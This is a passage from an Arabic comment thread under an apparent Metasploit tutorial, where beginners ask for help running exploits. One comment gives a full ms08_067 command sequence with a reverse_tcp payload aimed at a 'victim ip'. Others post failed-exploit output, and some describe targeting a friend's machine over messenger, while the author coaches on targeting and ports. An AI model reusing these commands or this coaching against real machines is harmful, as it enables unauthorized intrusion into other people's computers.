@MeiN KaMpF: عفوا أخي لتأخري.. لكن الآن حتى انتبهت لأسئلتك! بالنسبة للرسالة فهي تعني عدم تنفيذ الثغرة بنجاح.. لا أستطيع أن أقول لك أكثر من تأكد من الخيارات التي استخدمتها فكما قلت سابقا كل ثغرة تختلف عن الأخرى وهذه النوعية من الثغرات دقيق جدا! بالنسبة للمواقع لا يوجد شيء محدد, ابحث في Google وستجد كل شيء تحتاجه. بالتوفيق…
@mohamed clay: العفو أخي.. أتمنى أن تكون استفدت من الشرح. بالنسبة لاستفسارك تستطيع استخدام سطر أوامر المشروع المدمج بداخل الواجهة الرسومية للبرنامج ان كانت هذه الواجهة هي التي تعمل من المتصفح أو الواجهة الرسومية العادية الا أني أنصحك باستخدام نظام Linux عوضا عن Windows في هذه الامور.. أما الطريق الصحيح للبداية في الهاكر فهو يحتاج لموضوع كامل قد أقوم بكتابته قريبا حتى ذلك الوقت اطلع على هذه الصفحة وبالنسبة للـ Visual Basic شخصيا أجدها خيار سيئ! من الأفضل أن تبدأ باستخدام لغة برمجة حديثة وسهلة.. يوجد العديد من الخيارات أمامك فاختيار اللغة يعتمد على نوعية البرامج التي تريد برمجتها! ونظام التشغيل الذي تريد أن تبرمج له. بالتوفيق
شكرا لك اخي Br4v3-H34r7 على ارشادك وعلى مجهوداتك الاكثر من رائعة ويسعدنس ان اقول لك انني احضر الى الانتقال الى بيئة linux كما اريد ان اقول اني قرأت ان افضل لغة برمجة للبداية في عالم البرمجة هي visual basic ودلك لسهولتها كما انها تعتبر الطريق الاول لتفكير البرمجي على اي سوف اقرا عنها بعض الكتب وسانتقل مباشرة الى لغة c
مجددا شكراااااااااااا على تعاونك وعلى مواضيعك الرائعة
العفو أخي وأتمنى لك رحلة مفيدة باستخدام نظام جنو/لينوكس بالنسبة للبرمجة فكما قلت لك شخصيا أجد لغة Visual Basic خيار سيء وهذه تجربة مررت بها قبلك أضف الى ذلك أن اللغة قديمة وليست عملية!.. صحيح البعض ينصح بها لسهولتها أو لأن هذا الشخص يعرف البرمجة بهذه اللغة فقط! بالنسبة لي أنصحك باختيار لغة برمجة سهلة وحديثة عوضا عن C مثل لغة JAVA , Ruby أو الانتقال لبيئة الـ .Net والبرمجة بلغة #C أو Visual Basic.NET.
Exploit completed, but no session was created .
رابط الكتاب للي يعانون من الرابيد شير
جزاك الله خير .
فعـلاُ طرح جميل ويتميز باول طرح على المواقع العربية .
وكثرنا من الشروحات لان كل اتجاهي سيكروتي و هكر
لاهنت … اخوك لوفر الصغير المبتدي
@Tarek: أخي الرسالة تعني وجود خطأ باعدادات الثغرة أو الاستغلال وقد يكون النظام الذي تحاول تنفيذ الثغرة عليه محدث أو انك اخترت استغلال لا يحتاج لعمل session بالمشروع!
@migren: شكرا أخي.. أنا اخترت rapidshare لأني أملك حساب عليه ولأضمن بقاء الكتاب كوني أني لا أستطيع رفعه على سيرفر المدونة.
@lov3r: شكرا على الكمات والدعوات الجميلة أخي.. أتمنى أن يكون الموضوع نال اعجابك وأهلا بك في أي وقت
شكرا لك اخي فعلا ان الافضل في جميع المجالات (اختراق الاجهزة والامواقع)
بس عندي سؤال هل الثغرات يجب ان تكون مكتوبة بلغة خاصة لقرأها الميتا
مثلا .pm ؟
@فتى عاشق لعالم البرميجية: أخي اقرأ الموضوع ثم اطرح أسئلتك. لا تعليق!!
لسلام عليكم
الميتا سبوليت برنامج اكثر من رائع للهكر وواسع جدا في هذا المجال
احد الامور التي يوفرها هو الريموت دسكتوب
فحبيت اجرب هذا الشيء وقد ساعدني بهذا الشيء احد الاصدقاء الاستراليين حيث ارسلي المقطع على اليوتيوب من فتره ليست بالطويله لكن للاسف لم تنجح معي الفكره وتناسيت الموضوع حتى شاهدت الموضوع على موقع الاخ عبد المهيمن
ساكتب الخطوات وارجوا من اخواني مساعدتي في ايجاد الخطوه الخطأ التي بسببها لم انجح في التنفيذ
1- show exploits
2- use windows/smb/mso8_067_netapi
3- show options
4- set rhost (victem ip)
5- set target 0
6- show payloads
7- set payload windows/vninject/reverse_tcp
8- show options
9- set lhost (my ip)
10- exploit
لكن لم يتنفذ اي شيء وظهرت لي رسالة
no session
وكما نقول باللهجه العراقيه قوم التعاونت ماذلت
اخوكم القيصر
أخي كما ذكرت بالموضوع وفي الردود أكثر من مرة ثغرات الميتاسبلويت وثغرات الـ remote بشكل عام دقيقة جدا وأي خطأ سيؤدي لفشل الثغرة وعدم تنفيذها بطريقة صحيحة خصوصا اذا كان التطبيق على أنظمة ويندوز لأن اعدادت الثغرة تختلف من لغة للغة ومن اصدار SP لاصدار آخر! وقد يكون سبب عدم تنفيذ الثغرة هو أن الجهاز محدّث أو أنك اخترت اصدار خاطئ!
شرح ابداااااااااااع اهنيك صراحه
اقسم بالله كفوووووو على الشرح الي ولا اروع

أحييك على موضوعك الشيق والجبار أخي عبد المهيمن
وفقك الله فيما تصبو إليه و يرضاه
ana moahmed ( Ghost Wh!SpEr) mn egypt
wa thnx awy 3ala al ktaaaaaaaaaaab
خطير انت اخي في انتظار جديدك ياحلو ………………………
اخوي طبقت شرحك بس بالجزء اضافة ثغرة ما عرفت اضيف الثغرة جربت كل الطرق الممكنة
اذا في عندك فكرة اخوي عن هذا الشيء قول لي
انا استخدم وندوز
انا انتظر….
تحياتي
المجهوول
@المجهوول: استخدم Linux
لا أعلم لماذا الجميع مصر على ويندوز! على كل حال أتوقع أن الطريقة نفسها لكن عليك استخدام المسار التالي:
عوضا عن المسار الموجود في الشرح (لست متأكد من الطريقة لأني لا أستخدم ويندوز!) بالتوفيق…
مشكوور اخوي
اخوي بدي لينوكس مش لاقي اسطوانة
بس ان شاء الله رح انزله من النت
المهم اخوي اعرف المسار ووضعت بيه وكل شيء ما اجت الثغرة
اخوي انت اظن عرفتني بالشبكة الاحترافية ووضعت موضوع ترحيب بك
اهلا وسهلا بك مرة اخرى
تحياتي
المجهوول
العفو أخي.. لا أعلم أي شيء عن موضوع الترحيب أو “الشبكة الاحترافية” التي تتكلم عنها, قد يكون شخص آخر أو شخص يستخدم نفس اللقب! مع العلم أني لست مشترك بأي مواقع غير المذكورة بصفحة مـن أنــا.. تحياتي!
اوك اخوي ما علينا
المهم خلينا بالمشكلة
شو الحل اضافة ثغرة
انا انتظر جوابك اخوي …..
تحياتي
المجهول
السلام عليكم
ياشيخ والله تابعت كل دروسك وطبقت الدرس بس شوف شو طلع لما عملت exploit
>> exploit
[*] Started reverse handler
[-] Exploit failed: The connection timed out (الايبي). [*] Exploit completed, but no session was created.
msf exploit(ms04_011_lsass) >
أخي أتوقع أن رسالة الخطأ أكثر من واضحة ويوجد عدة أسباب لعدم عمل الثغرة بالشكل المطلوب, لا أستطيع أن أقول لك أكثر من تأكد من الخيارات التي استخدمتها وأن الجهاز الذي تحاول اختراقه ليس محدّث أو أن مدير النظام لم ينصب ترقيع للثغرة!
اخي انا لدي لينيكس توزيعة mandariva هل يمكن استعماله في تلك التوزيعة
ادا نعم هل مسارات تتبدل
و شكراااا
انا جربته المسار /home/mustapha/Bureau/framework-3.2 ./msfconsole
لكن لم يشتغل معي
أخي ادخل من سطر الأوامر الى مجلد المشروع ثم نفذ الأمر السابق..!
ومشكـور وعسـى كل ذنبك مغفور ^_^ وهذا أيميلي يآملك ffa_12@hotmail.com
يعطيك العافيه لاهنت على الشرح
شكرا أخي بارك الله فيك
لكن ممكن أجرب ثغرات الميتاسبلويت على جهازي
أي أكون المهاجم والضحية في نفس الوقت
لكي اتدرب على الأداة
الرجاء أفدنا
مشكور أخي والله شرح يستاهل كل التقدير

لكن فيه مشكل في إضافة الثغرات و أنا أستعمل الإكسبي وشكراااا
أضع الثغرات في هدا المسار لكنها لا تظهر بعد تشغيل الميتا
msf32\modules\exploits\windows
ممكن الحل أخي
@Dz_V!rUs: أجل تستطيع ذلك لكن هل تستخدم نظام يحتوي على ثغرات
هذا سيعرضك بشكل كبير للاختراق الأفضل انشاء مختبر خاص بك باستخدام برنامج VMware مثلا وتنصيب عدة أنظمة تخيلية بداخلة والتجربة عليها.
@GH.SK.GH: للأسف لا أستطيع مساعدتك لأني لا أستخدم نظام ويندوز ببساطة! اما استخدم لينوكس أو قم باستعمال Metasploit من LiveCD مثل Back|Track.
مشكور أخي أنا أقدر ظروفك و إنشاء الله سوف أنصب لينيكس
بالتوفيق للجميع
بارك الله فيك
موضوع مفيد للمبتدئين
سلام اخي ممكن مساعدة فانا عند استعمالي لل ميتا لم استطع الاتصال بجهاز صديقي الذي على المسنجر حيث اتبعتك خطوة خطوة و عند عمل اكسبلوت
set LHOST *********
exploit
Exploit Failed: Connection timed out X.X.X.X:444
ممكن مساعدة ضروري
@unforgiven: جهاز صديقك على الماسنجر
رسالة الخطأ واضحة أخي Connection timed out! ولا أعلم أي ثغرة استخدمت حتى تتصل به عن طريق المنفذ 444!
تسبم حبيبي
و الله شرح فوق المستوى
و الله بدي اسئلك سؤال..
-ما هي النتيجة اللي تجي بعد استهداف الموقع تعني هل نسفه هل حصول على الاسم و الباس الادمن و لا شئ أخر ممكن تدكرلي ما هو ؟
و شكرا لك أخي
السلام عليكم
طيب حبيبي انا عملت الخطوات بس بعد هكذا المفروض الرابط يصير ايه عشان تعطيه للضحية ؟
يعني لو الاى بى اللى منفذ منه العملية هو 192.168.1.3 و الأى بى اللى حتخترقه 192.168.1.8 فاللى سيتم اختراق جهازه (صاحب 192.168.1.8 ) المفروض يفتح ايه بالضبط ؟؟ وبأى بورت ؟؟
وهل البورت 4444 لازم يكون مفتوح بالجهاز ؟
اخوى انتظرك على احر من الجمر ويارب ترد علطول وشكراً
ياترى اين ذهب التعليق الاخر لى؟؟
وهل يجب ان يكون البورت 4444مفتوح بجهاز المٌخترق
اخى الكريم كان سؤالى هو ماذا سيكون الرابط الذى تعطيه لضحيتك
@احمد: اقرأ الموضوع مرة أخرى بتمعن وستعرف أن المنفذ 4444 سيتم فتحه بعد تنفيذ الاستغلال!! أي عندما يوجد ثغرة في النظام/البرنامج يتم ارسال الاستغلال وفتح المنفذ 4444 لتتمكن من الاتصال به.
ناااايس والله انك صنديد
يعني بطل 

استمر..
<<<<<متااابع بصمت
السلام عليكم ,,
ياوحش الوحوش
والله انت بطران البطرانين تصدق الناس تتمنى اضافه اي مشهور يعني اللي يبي لاعب كوره واللي يبي ممثلـ او مغني , , يجلس معه خمس دقايقـ ,, انا صراحه ما اتمنى الا اني اضيفك واجيبك بطياره خاصه واجلس معك ربع ساعه < وش عنده الكاش
علشان ناخذ منك جميع ما تعرفه عن الميتاسبلويت ثم بعدها برى الباب ,, خخخخ اقصد نرجعك ..
هذي مقدمه عن مشاعري اتجاهك حاليا
مقدمتي انا ماعندي معلومات عن الاختراق الا 1% وهالواحد اعرف كيفه الاختراق وشلون بس اما برامج واستغلال لا والله ,, بس عندي الحمدلله عندي فكر كمبيوتري يعرف يطبق ويعرف يغير حسب حاجته < اقولها لاني اشوف بعض الدروج في منتدياتنا مايعرفون يطبقون الشروح < وكذا هم يرفعون معنوياتي واحس اني شوي مميز
بس بسئلك اسئله عده وارجو انك تتحملني عالسالفه الطويله
1- جربت بالباك تراك 4 على جهاز اخر في الشبكه معي بنظام ويندوز اكس بي وسكرت جدار الحمايه وعلما بان الجهاز محدث الى اخر تحديث في هذا اليوم يعني سيرفر باك3 واصل الويندوز الاكس بي كان ويندوز اكس بي سيرفر باك 2 < كاتب هالملاحظه لاني في فحصي بـ nmap
عطاني معلومات انه OS details: Microsoft Windows XP SP2 وانا عارف انه سيرفر باك 3
وبعض الاجهزه يعطيني انه ويندوز 2003 وانا اعرف ان محدث الى سيرفر باك 3
انا اقول هالكلام لان في شرحك target حددت الاكس بي سيرفر باك 2 وحددت وحاولت الثالثه 3
وايضا عندما اعرض targets يطلعي انواع الاكس بي عربي وفرنسي وانجليزي فوق 100 نوع
فخفت ان اصله انجليزي ومعرب جربت اغير يعني حاولت جميع الخيارات الممكنه
حبيت اذكر هذي علشان تقول هل فيه فوارق في اني احدد قيمه targets ولا لا
ثاني شي بعض الاستغلات تكون القميه targets ( اوتماتيك ) < واقد اغيرها طبعا
هل تنصح بتغيرها ولالا ؟
2- في فحص للمنافذ 135 و139 و 2869 كانت كلها اوبن والسبب اني معطل الجدار
طبعا 135 Microsoft Windows RPC ومعروف في كل الاجهزه
و139 ما حط لي اسم لاستغله وانا مثل ماقلت لك جاهل مع اني اعرفه انه منفذ لنت بيوس في كل الاجهزه
ومنفذ 2869 Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)
انا جربت استغل 135 الظاهر انه بـ windows/dcerpc/ms03_026_dcom
طبعا كلش سويته صح ولكن ما ارسل شي وعرفت ان هالاستغلال قديم وكذا حاط في مقدمتي انه جهاز محدث الخ وكذا على ما اعتقد اللي ابيك تتاكده لي انه خلاص ماتنفع على الجهاز ولو ان البورت 135 مفتوح وبدون جدار حمايه
وهل في هالاجزه السيرفر باك 3 من البورتات اللي فوق اقدر استغل :( ؟
3- في جهاز في الشبكه عندي لقيت عنده بورت 1110 +19780
ما رايك في البورتين هل تتدل على اختراق احد للجهاز وهل اقدر استغلها انا بالمتاسبوليت
——————–
اخيرا واقسم بان مدونتك شي خيالي من جميع النواحي ..المواضيع والمتابعه وحتى الوان المدونه طلقه بمعنى الكلمه وتصميمه بهذا بهذا الشكل يدل على الذوق اللي تملكه في اختيارك لها بهذا الشكل ,, وهذا الكلام موب تشيجع تستحقه بس .. الا طمع ايضا في ان تستمر بهذي الطريقه :
D
واقتراح بسيط انت واحد ولا اظنك تلحق كلش وخاصه بان مدونتك يزاداد زوارها والعالم يبونك تستمر في العطا الصدق ..
فلو تخلي احد يساعدك ممن تثق فيه يكتب الشروح للمبتدئين وانت في شروحك الجديده تربط برابط يرجع لشرح الخاص لمبتدئ قبل ان يشوف شرحك ..ولا تجيك مثل هالاسئله قبل ان تيدا علشان تصير المدونه 100% وكذا يحصل لك وقت اكثر واكثر وهو عباره عن اقتراح واسف اني حطيته بالرد
مشكور اخى على المعلومات القيمة والمجهود الاكثر من رائع و كلمة شكر لا تكفى …….. ونسئل لك لك ميزيدا من التالق بادن الله
صراحة موضوع منطم و جميل فى خطا مطبعى بسيط ان شاء الله فى الجملة دى “”" المشروع و ثغراته تبرمج بلغة Perl و تأتي بالامتداد pm “”"” الثغرات كانت بامتداد pl وليس PM
@AlooOha: عذرا.. يبدوا أن تعليقك سقط سهوا فالآن حتى انتبهت له! ربما لأنه طويل فأجلته لوقت آخر ثم نسيته << ارحمنا بحجم التعليق في المرة القادمة
يوجد مجتمع iSecur1ty أكتب به أنا ومجموعة من الأصدقاء.
بخصوص nmap فهي تعتمد على الـ Remote OS Fingerprint وتحاول معرفة النظام عن بعد, لكن النتيجة تكون تقريبية ولا تستطيع الجزم بأنها صحيحة! وطبعا يوجد فرق بين حزمة Service Pack وأخرى وبين لغات النظام لأن عندما تتغير الـ Service Pack أو لغة النظام تتغير بعض ملفات dll وهي الملفات المسؤولة عن التعامل مع الكيرنل في نظام ويندوز والتي يتم الاعتماد عليها في استغلال الثغرة وتشغيل الشيل كود في الذاكرة. عندما تجد خيار automatic متوفّر فالأفضل أن تبقى عليه لأنه الأضمن وسيقوم بتجربة الخيارات حتى تعمل الثغرة (الا اذا كان لك غايات أخرى) بخصوص المنافذ التي ذكرتها فهي منافذ خاصة بنظام ويندوز واذا كانت مفتوحة لا يعني أنك قادر على اختراق الجهاز (اذا كان محدث), بخصوص المدونة أنا الذي أكتب فيها فقط لأنها ببساطة "مدوّنة"
@tnk: البرامج المبرمجة بلغة بيرل تأتي عادة بالامتداد pl لكن حسب معلوماتي وتعاملي مع المشروع الثغرات كانت تأتي بالامتداد pm ويمكنك مراجعة موقع ميلوورم للتأكد (بالمناسبة لا يوجد فارق ان كانت pm أو pl فالثغرة ستعمل على مفسّر بيرل مهما كان الامتداد!)
مشروع الميتا مشـروع نـآجـح فعـلاً لمن يجيد أستخدامه
شكـراً لك يا عبد المهيمن على الشـرح ,,
السلام عليكم ورحمة الله وبركاته
ما شاء الله مدونتك اخي رائعة وجميلة انا نفذت الشرح على احد الاجهزة معي في الشبكة ولاكن تظهر لي رسالة لا اعلم ما هي انظر هذا ما يخرج لي عند تطبيق امر EXPLOIT
Started reverse handler
[-] Exploit failed: The connection timed out (10.0.0.2:445).
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) >
ما معنى هذا اخي وشكرا لك على اية حال
بارك الله فيك
والله جامد جداً وواضح جداً انك تعبت
بص انا مبتدئ فى الباك تراك عموماً واتعلمت طريقة تثبيتها من المدونة وتابعت معاك الشرح للأخر بس طبعاً ما فيش حد اجرب عليه
هابقى اخلى حد من صحابى فى الشبكة يفتح برنامج من اللى موجودين فى الميتاسبلويت واجرب انفذ عليه .. وان شاء الله اقولك النتيجة
تسلم ايدك يا باشا
اه عايز اعرف حاجه
إزاى اقدر اتعلم حاجات كتير فى الميتاسبلويت .. مع العلم انى مبتدئ طبعاً ودى اول مره افتح المشروع ده
والله لا يحرمنا من جديدك
سلام عليكم يا عبدالمهين ..
لابد نظام Linux عشان أقدر استخدم Metasploit
أو ممكن التعامل معه في بيئة الـ windows
( السلام عليكم ورحمة الله وبركاته )
كيف حالكم
اخوي مشكورر رررررررررررررررررررررررررررررر وما قصرت
أفدتني أخوي عبدالمهين 10000% درجه جزاك الله كل خير .. شروحاتك مميزه ونادره . الف شكر لك .. تقبل خالص تحياتي أخوك عبدالله التميمي
السلام عليكم اخي الكريم
سؤال محيرني وعقدتي حاليا هي ؟
هل يجب ان يكون الايبي تبعي يكون مثل ( ×.×.192.168 ) مع العلم ان هذا الايبي يعتبر من الراوتر .. اي شبكه داخلية . لنفترض انه يجب ان يكون كذلك .. كيف نجلب الايبيات اللتي تحتوي على شبكة داخليه ؟؟ مع العلم ان شبكتي ليس بها غيري انا وهو ايبي واحد فقط ؟
اذا كان قصدك بعمل فحص على شبكتي عن طريق Nmap فهل هذا يعني انه سيقوم بفحص الشبكه العنكبوتية كامله ؟؟
ارجوا ان تعذرني على اسئلتي التي قد تكون اكثر غباء من ان يسألها شخص مثلي لكن منكم نستفيد ونتعلم .
وشكرا لك على المدونه الرائعه جدا جدا .
اخي لك كل الشكر والتقدير على ها الطرح الجميل والموضوع القيم , تحياتي وننتظر المزيد من ابداعك عزيزي .
أهلا ً أخــي و الله إإبدآآآآع .. بارك الله فيك على الدرس الرائع … بالتوفيق لك ~
ماشاء الله عليك .. مبدع !
ارجوووووووووووووووك ارفع الكتاب وربي مالقيته لا في المنتديات اعربية والاجنبية بفلوس
ممكن ترفع الكتااااااب ابليز ارجوك يرحم والديك
موضوع جيد وآعتبره مشروع بداية تعلم كل مبتدئ
موفق !F
السلام عليكم و رحمة الله و بركاته
هل يمكن البحث في Metasploit عن ثغرات لنظام معين فقط ؟
@SIFE: يمكنك استخدام الأمر:
من داخل سطر أوامر المشروع وتستطيع البحث عن الثغرات في الواجهة الرسومية و الواجهة التي تعمل من المتصفّح أيضاً.
السلام عليكم
والله شرح ممتاز بارك الله فيك اخي الشارح …
هل تستطيع ان ترفع الكتاب الموجود على موعق اخر غير 4 shared و rapidshar
لانني لم استطع تحميله
السلام عليكم و رحمة الله و بركاته
عندي مشكلة مع metasploit 3 منصبة على FreeBSD 7 داخل VirtualBox ،عند تنفيذ الأمر exploit بعد ثواني تظهر لي time out ،رغم وجود نظام WinXP SP2 على شبكة VirtualBox .
الأمر ping يعمل عادي :
ping 10.0.0.4
وربي موقعك شي وعاجبني مره
كفوووووووووووووووو والله
يعطيك العافيه على المعلومات القيمه
جاري الحفض في المفضله
سلام عليكم
كيفك اخوي ان شاء الله طيب … الموضوع جداً روعه والاروع المدونه والاروع من ذالك هو انت
عندي سؤال بسييط بس
انا اضفت اسم مستخدم ورقم سري جديد في الميتاسبلويت باحدى المواقع لاكن لا اعرف ماذا افعل بعد ذالك ..
اشكرك
السلام عليكم

مشروع الميتا من اقوى المشاريع التي اعجبتني في عالم الاخترق
لكن س
مثلا قمنا بSCAN باداة NMAP فوجدنا المنفذ عدد 135 مفتوح
فماهي الثغرة التي نستعملها ؟؟؟ او التي تستعمل الPORT 135
بارك الله فيك
السلام عليكم و رحمة الله و بركاته
لدي مشكلة مع MS بحيث مع تنفيذ الثغرة فإنها تظهر لي الراسلة التالية :
[*] Started bind handler
[*] Triggering the vulnerability…
[*] Exploit completed, but no session was created.
المشكلة كما ترى أن تنفيذ الثغرة لا يكتمل لا أعرف لماذا ،هل لديك فكرة .
@linuxshell: المنفذ 135 يستخدم بنظام ويندوز يمكنك مثلا تجربة الثغرة المكتشفة في خدمة dcom والتي تمكنك من اختراق النظام عن بعد, لكن ليس بالضروري أن تتمكن من ذلك لأن الثغرة قديمة نوعاً ما ولن تتمكن باستخدامها من اختراق الأنظمة الحديثة لكن معرفة أن النظام هو ويندوز يفتح لك المجال لاستخدام العديد من الثغرات الأخرى التي تمكنك في النهاية بطريقة أو بأخرى اختراق النظام.
@SIFE: رسالة no session was created تعني أن استغلال الثغرة فشل ويوجد 100 احتمال لذلك خصوصاً أنك لم تذكر أي تفاصيل عن الثغرة, راجع موضوع الاستخدامات المتقدمة وابحث في التعليقات فغالباً ستجد معلومات مفيدة تكمل الموضوع.